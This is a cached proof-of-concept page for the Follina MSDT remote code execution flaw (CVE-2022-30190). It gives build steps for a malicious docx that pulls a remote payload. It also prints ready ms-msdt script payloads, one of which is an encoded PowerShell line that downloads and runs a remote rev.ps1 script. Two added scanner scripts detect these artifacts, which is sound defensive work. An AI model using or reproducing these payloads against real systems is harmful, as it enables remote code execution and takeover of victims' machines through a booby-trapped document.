POC details: f41b3532b046664090abcf1497f67c63c05e33fa

Source
Related vulnerability
Title: Microsoft Windows Support Diagnostic Tool OS command injection vulnerability (CVE-2022-30190)
Description: Microsoft Windows Support Diagnostic Tool is a Microsoft (USA) tool that collects information to send to Microsoft Support. Microsoft Windows Support Diagnostic Tool (MSDT) has an OS command injection vulnerability. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Systems, Windows
Description
CVE-2022-30190 | MS-MSDT Follina One Click
Introduction
# MS-MSDT-Office-RCE-Follina
CVE-2022-30190 | MS-MSDT Follina One Click

1. Create a Docx file.
2. In the Docx file, Insert > Object > Bitmap Image > Ok
3. In the Paint application that launched, save the Paint file.
4. Save your Docx file.
5. Open your file as an archive (With 7Zip; Right Click > 7Zip > Open Archive.)
6. Copy out document.xml from `\word\` and the document.xml.rels file from `\word\_rels\`
7. Open/Edit the \word\_rels\Document.xml.rels and locate the relationship XML Tag with "/relationships/oleObject". After this replace the destination in "Target=" to your remote destination where it will grab the payload from. Also add "TargetMode="External"" to the XML Tag.
8. Compress back to Docx file (Send to > Compressed (zipped) folder  |  Rename file type from zip > docx/doc )
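The artifact that steps 1 to 8 produce has one distinguishing feature: an oleObject relationship in `word/_rels/document.xml.rels` whose `Target` is a remote location and which carries `TargetMode="External"`, instead of the usual embedded `embeddings/oleObject1.bin`. The following scanner, added here as a defensive example (it is not part of the original README or of any PoC), opens a document as the zip package it is and reports exactly those relationships. The sample package, relationship part and placeholder URL are all constructed inline so the script runs offline.

```python
"""Flag external oleObject relationships in an OOXML (.docx) package.
Added defensive example; the sample document below is constructed, not a real file.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespace of the *.rels parts and the relationship type used for OLE objects.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def external_ole_relationships(rels_xml: bytes) -> list:
    """Return (Id, Target) for every oleObject relationship marked External.

    An embedded OLE object points at a part inside the package; a Follina-style
    document points outside it, which is the condition checked here.
    """
    root = ET.fromstring(rels_xml)
    hits = []
    for rel in root.iter(f"{{{REL_NS}}}Relationship"):
        if rel.get("Type") == OLE_REL_TYPE and rel.get("TargetMode") == "External":
            hits.append((rel.get("Id"), rel.get("Target")))
    return hits


def scan_docx(data: bytes) -> list:
    """Walk every .rels part of the package (a zip) and collect the hits."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            if name.endswith(".rels"):
                hits.extend(external_ole_relationships(pkg.read(name)))
    return hits


# Constructed sample relationship part: rId1 is a normal embedded OLE object,
# rId2 is the external one step 7 describes (the URL is a placeholder).
SAMPLE_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OLE_REL_TYPE}" Target="embeddings/oleObject1.bin"/>
  <Relationship Id="rId2" Type="{OLE_REL_TYPE}" Target="http://example.invalid/index.html" TargetMode="External"/>
  <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
</Relationships>
""".encode()


def build_sample_docx(rels: bytes = SAMPLE_RELS) -> bytes:
    """Minimal constructed package containing only the parts the scanner needs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<w:document/>")
        pkg.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def build_clean_docx() -> bytes:
    """Constructed package whose only OLE relationship is embedded (no hit expected)."""
    clean = SAMPLE_RELS.replace(
        b'<Relationship Id="rId2" Type="' + OLE_REL_TYPE.encode()
        + b'" Target="http://example.invalid/index.html" TargetMode="External"/>\n', b"")
    return build_sample_docx(clean)


if __name__ == "__main__":
    for rel_id, target in scan_docx(build_sample_docx()):
        print(f"external OLE relationship {rel_id} -> {target}")
```

To use it on a real file, pass `open(path, "rb").read()` to `scan_docx`; the same check applies to `.dotx`/`.docm` packages, since they share the relationship model.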

--------------------------------------------------------------------------------------------------------
### RTF File Type
Once a docx has been saved using the steps and parameters above, save the docx as an RTF.

> If you also add these elements under the `<o:OLEObject>` element in `word/document.xml`:

```
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>
```

--------------------------------------------------------------------------------------------------------
The act of recompressing can be observed in JohnHammond's Python script as well (excerpt; `args.output` and `doc_path` are that script's own variables):

```
import os
import shutil

# ~ Rebuild the original office file ~
# Zip the unpacked document directory, then drop the ".zip" suffix so the
# result is the .docx path the script was asked to write.
shutil.make_archive(args.output, "zip", doc_path)
os.rename(args.output + ".zip", args.output)
```

Reference: https://github.com/JohnHammond/msdt-follina/blob/main/follina.py



--------------------------------------------------------------------------------------------------------





## Payloads 

### Basic Calc Execute:
```
<script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>
```

Can Replace the Start-Process('calc') with:
> IEX('calc.exe')
--------------------------------------------------------------------------------------------------------
### SMB Share Execution:

```
<script>
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=/../../$(\\\\taretip\\share\\poc)/.exe)"";
</script>
```
--------------------------------------------------------------------------------------------------------
### PS1 File Load:
```
<script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cG93ZXJzaGVsbC5leGUgLWMgImlleCAoaXdyIGh0dHA6Ly8xOTIuMTY4LjE5OC4xMjgvcmV2LnBzMSAtVXNlQmFzaWNQYXJzaW5nKSIK'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>  
```

Decoded:
Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("powershell.exe -c "iex (iwr http://192.168.198.128/rev.ps1 -UseBasicParsing)""))
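All three payloads above share the same shape: a page that navigates to an `ms-msdt:` URI naming the `PCWDiagnostic` troubleshooter and passing `IT_*` parameters, with a PowerShell `$( )` subexpression inside the `IT_BrowseForFile` value. The scanner below, added here as a defensive example (not part of the original README), pulls those indicators out of fetched HTML so an analyst can triage a page without rendering or evaluating anything in it. The sample page is constructed and its command is a placeholder.

```python
"""Report ms-msdt: URI indicators found in HTML/text content.
Added defensive example; SAMPLE_HTML is constructed with a placeholder command.
"""
import re

MSDT_SCHEME = re.compile(r"ms-msdt:", re.IGNORECASE)
DIAG_ID = re.compile(r"/id\s+(\w+)", re.IGNORECASE)   # "/id PCWDiagnostic"
PARAM = re.compile(r"(IT_\w+)=")                       # "IT_BrowseForFile=..."


def scan_html(text: str) -> list:
    """Return one finding per ms-msdt: URI in the text.

    Each finding records where the URI starts, which diagnostic it invokes,
    which IT_* parameters it passes, and whether the URI carries a PowerShell
    subexpression "$(", which is what turns the troubleshooter into execution.
    """
    findings = []
    for m in MSDT_SCHEME.finditer(text):
        tail = text[m.start():]
        # Cut at the end of the enclosing script block (or the end of input).
        end = tail.lower().find("</script>")
        uri = tail if end < 0 else tail[:end]
        diag = DIAG_ID.search(uri)
        findings.append({
            "offset": m.start(),
            "diagnostic_id": diag.group(1) if diag else None,
            "parameters": PARAM.findall(uri),
            "subexpression": "$(" in uri,
        })
    return findings


# Constructed sample page mirroring the payload layout above; the command inside
# the subexpression is a placeholder, not an executable payload.
SAMPLE_HTML = """<html><body>
<script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_SelectProgram=NotListed IT_BrowseForFile=$(PLACEHOLDER_COMMAND) IT_AutoTroubleshoot=ts_AUTO\\"";
</script>
</body></html>"""

BENIGN_HTML = "<html><body><p>Nothing to see here.</p></body></html>"


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f)
    print("benign page findings:", scan_html(BENIGN_HTML))
```

The check is deliberately string-based: because MSDT parses the parameters itself, there is no need to understand the JavaScript around the URI, and the same function works on an RTF or a proxy log line that carries the URI verbatim.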

--------------------------------------------------------------------------------------------------------
### Apache2 access.log should show connection upon opening file
![Log Example](/log.png?raw=true "Example")

File snapshot

```
[4.0K] /data/pocs/f41b3532b046664090abcf1497f67c63c05e33fa
├── [4.0K] doc
│   ├── [1.3K] [Content_Types].xml
│   ├── [4.0K] docProps
│   │   ├── [ 704] app.xml
│   │   └── [ 735] core.xml
│   └── [4.0K] word
│       ├── [3.8K] document.xml
│       ├── [1.5K] fontTable.xml
│       ├── [4.0K] _rels
│       │   └── [ 991] document.xml.rels
│       ├── [2.9K] settings.xml
│       ├── [ 29K] styles.xml
│       ├── [4.0K] theme
│       │   └── [6.6K] theme1.xml
│       └── [ 803] webSettings.xml
├── [ 10K] file.docx
├── [9.4K] index.html
├── [126K] log.png
└── [3.6K] README.md

5 directories, 14 files
```
Shenlong bot has cached this for you
Notes
    1. Accessing the original via the source is recommended.
    2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.